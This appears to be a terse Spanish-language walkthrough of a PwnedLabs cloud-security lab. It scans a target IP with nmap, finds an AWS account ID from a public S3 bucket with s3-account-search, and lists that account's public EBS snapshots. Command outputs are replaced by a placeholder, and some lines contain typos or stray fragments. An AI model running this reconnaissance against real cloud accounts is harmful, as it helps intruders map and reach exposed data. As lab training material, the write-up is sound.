PwnedLabs Identify the AWS Account ID from a Public S3 bucket

May 17, 2024
Linux

ping -c 1 54.204.171.32

Nos damos cuenta que es un servidor Linux

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 54.204.171.32 -oG allPorts

ssh_command.

nmap -sCV -p80 54.204.171.32 -oN targeted

ssh_command.

whatweb http://54.204.171.32

ssh_command.

pip3 install s3-account-search

sudo ln -s /home/user/.local/bin/s3-account-search /usr/local/bin/s3-account-search

ssh_command.

Hacemos como un whoami pero en aws

aws sts get-caller-identity

ssh_command.

bc targeted -l rb

ssh_command.

s3-account-serach arn:aws:iam::427648302155:role/LeakyBucket mega-big-tech

ssh_command.

curl -I https://mega-big-tech.s3.amazonaws.com | grep region | awk '{print $2}'

ssh_command.

aws ec2 describe-snapshots --owner-ids 107513503799 --restorable-by-user-ids all

ssh_command.